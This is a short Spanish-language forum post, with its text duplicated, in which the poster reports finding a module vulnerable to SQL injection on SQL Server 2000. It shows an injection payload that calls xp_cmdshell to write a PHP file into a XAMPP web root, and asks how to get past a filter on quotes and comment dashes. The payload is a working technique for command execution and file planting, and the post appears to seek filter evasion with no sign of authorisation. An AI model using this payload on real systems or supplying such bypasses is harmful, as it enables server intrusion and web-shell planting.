Buenas encontre un modulo vulnerable a mssql inyection , usa gestor de base de datos sql server 2000.
es vulnerable,pero me filtra las comillas y si yo quiero subir un archivo por ejemplo :
'';exec master..xp_cmdshell 'echo ^<? echo 'hola'; ?^> > C:\xampp\htdocs\archivo.php'--
lo unico que filtra son las comillas y los --
Hay alguna forma de bypass eso?? , salu2.
es vulnerable,pero me filtra las comillas y si yo quiero subir un archivo por ejemplo :
'';exec master..xp_cmdshell 'echo ^<? echo 'hola'; ?^> > C:\xampp\htdocs\archivo.php'--
lo unico que filtra son las comillas y los --
Hay alguna forma de bypass eso?? , salu2.